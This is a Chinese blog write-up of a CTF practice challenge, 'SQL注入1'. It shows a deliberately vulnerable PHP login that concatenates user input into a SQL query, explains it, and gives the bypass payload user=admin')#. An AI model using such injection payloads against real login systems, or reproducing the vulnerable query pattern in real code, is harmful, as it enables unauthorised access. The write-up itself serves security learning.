CG-CTF-Web-SQL注入1

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量943 收藏 1
点赞数 1
分类专栏: CTF刷题 文章标签: CG-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/95378902
版权

SQL注入1

1.题目
在这里插入图片描述
2.我们查看一下题目
在这里插入图片描述
3.我们查看一下Source,看看有什么收获
在这里插入图片描述
好的,我们接下来分析代码

<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST[user]);
  $pass = md5(trim($_POST[pass]));
  $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
    echo '</br>'.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
      echo "<p>Logged in! flag:******************** </p>";
  }
  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>

核心函数释义:

  • trim() 函数移除字符串两侧的空白字符或其他预定义字符。
  • mysql_query() 函数执行一条 MySQL 查询。
    返回值
    mysql_query() 仅对 SELECT,SHOW,EXPLAIN 或 DESCRIBE 语句返回一个资源标识符,如果查询执行不正确则返回 FALSE。
    对于其它类型的 SQL 语句,mysql_query() 在执行成功时返回 TRUE,出错时返回 FALSE。
    非 FALSE 的返回值意味着查询是合法的并能够被服务器执行。这并不说明任何有关影响到的或返回的行数。很有可能一条查询执行成功了但并未影响到或并未返回任何行。
  • mysql_fetch_array() 函数从结果集中取得一行作为关联数组,或数字数组,或二者兼有
    返回根据从结果集取得的行生成的数组,如果没有更多行则返回 false。

4.核心代码分析:
我们需要user=admin
假设加密后的pass=21232f297a57a5a743894a0e4a801fc3

$sql="select user from ctf where (user='"admin"') and (pw='21232f297a57a5a743894a0e4a801fc3')";
echo '</br>'.$sql;   //$sql=select user from ctf where (user='"admin"') and (pw='21232f297a57a5a743894a0e4a801fc3')
$query = mysql_fetch_array(mysql_query($sql));
//mysql_query执行$sql语句,但是返回You are not admin!   
//这里考虑的情况可能是,账户密码不正确,mysql_query($sql)返回false,所以mysql_fetch_array()括号内的内容是false,并不是一个数值,所以无法形成数组,当然$query变量里也就没有user与admin了。
//虽然我们不知道它密码,但我们看它要我们[user]==admin,于是猜想极有可能用户名user是存在的,因此,最后尝试$sql=select user from ctf where (user='admin'),直接在数据库中查询用户名admin,sql语句返回的结果肯定会有类似user=admin,最后在mysql_fetch_array函数下生成数组,于是我们构造payload,如何构造请看第5if($query[user]=="admin") {
echo "<p>Logged in! flag:******************** </p>";
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}

5.构造payload

if($_POST[user] && $_POST[pass])
$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";   //$user带进去后,这里的双引号就会消失的
构造语句:user=admin')#&pass=Password

6.得到flag
在这里插入图片描述

1stPeak
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 389
个人CTF学习之路
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5100
Ctfhub解题 web SQL注入
ctf-web-sql注入
god_001的博客
05-03 1万+
题目链接:跳转提示 打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注 首先在用户名处输入admin 得到结果: 即密码确为admin,而如果不输入用户名直接输入密码,发现报错 可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。 经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用 尝试输入
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1305
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1151
简单的SQL注入
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4165
ctfshow 靶场 web入门 sql注入系列
CTFshow——web入门——sql注入
h_adam的博客
03-14 5499
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
超微X11SPW-CTF主板用户手册
04-01
超微X11SPW-CTF主板用户手册
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
My-CTF-Challenges
05-16
它简化了数据处理的过程,但也可能带来安全风险,因为未经验证的数据可以直接注入到对象中,可能导致SQL注入或其他类型的安全漏洞。 **反序列化:** 反序列化是将从网络或磁盘读取的序列化数据转换回其原始对象的...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 1848
自用
CG CTF WEB SQL注入1
无限迭代中......
07-04 1145
http://chinalover.sinaapp.com/index.php 题解: <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOS...
CG CTF SQL注入1
qq_46389295的博客
02-23 228
题目链接 源代码 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = trim($...
CTFweb篇-SQL注入(四)
weixin_44597701的博客
08-17 437
Less11 这一关主要就是改post请求,用post请求的参数来进行注入 填写admin登陆后仍然没有get参数 考虑就是post请求 这里就用burp suite抓包 这里就是post传入的参数值,改的就是这个值 我们把这个值拿到hackbar里面来进行操作 我们传入uname=admin’,系统会报错 right syntax to use near 'admin' LIMIT 0,1' at line 1 我们再传uname=admin",就没有报错了 证明这里是双单引号包裹 于是传入uname
CTF-SQL注入
weixin_44770698的博客
06-16 5034
CTF-SQL注入题目整理
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5749
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
CTFSQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
Ubuntu-CTF
07-28
chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值